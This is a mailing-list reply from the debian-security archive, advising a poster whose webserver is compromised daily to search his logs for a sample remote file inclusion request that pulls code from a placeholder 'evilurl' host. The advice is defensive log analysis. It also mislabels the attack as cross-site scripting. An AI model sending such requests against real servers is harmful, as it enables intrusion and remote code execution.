Re: Advice needed, trying to find the vulnerable code on Debian webserver.

To: Ross Tsolakidis <Ross.Tsolakidis@day3.com.au>
Cc: debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian webserver.
From: Alf B Lervaag <alfborge@stud.ntnu.no>
Date: Wed, 16 Jun 2004 13:38:38 +0200
Message-id: <[🔎] 20040616113838.GG22311@stud.ntnu.no>
In-reply-to: <[🔎] D03D875AFA05D34C98F1B0DBB71C3DBA6E1B2A@hermes.powerserve.lan>
References: <[🔎] D03D875AFA05D34C98F1B0DBB71C3DBA6E1B2A@hermes.powerserve.lan>

Ross Tsolakidis wrote:
> One of our webservers seems to get compromised on a daily basis.
> When I do a ps ax I see these processes all the time.

I suspect cross site scripting.  You should parse your logs and search
for requests like:
 GET /~stupiduser/buggy-script.cgi?include=http://www.evilurl/malicious-code.txt

-- 
Alf

Reply to:

References:
- Advice needed, trying to find the vulnerable code on Debian webserver.
  - From: "Ross Tsolakidis" <Ross.Tsolakidis@day3.com.au>

Prev by Date: Re: IPSec tunnels with isakmpd
Next by Date: Re: IPSec tunnels with isakmpd
Previous by thread: Re: Advice needed, trying to find the vulnerable code on Debian webserver.
Next by thread: RE: Advice needed, trying to find the vulnerable code on Debian webserver.
Index(es):
- Date
- Thread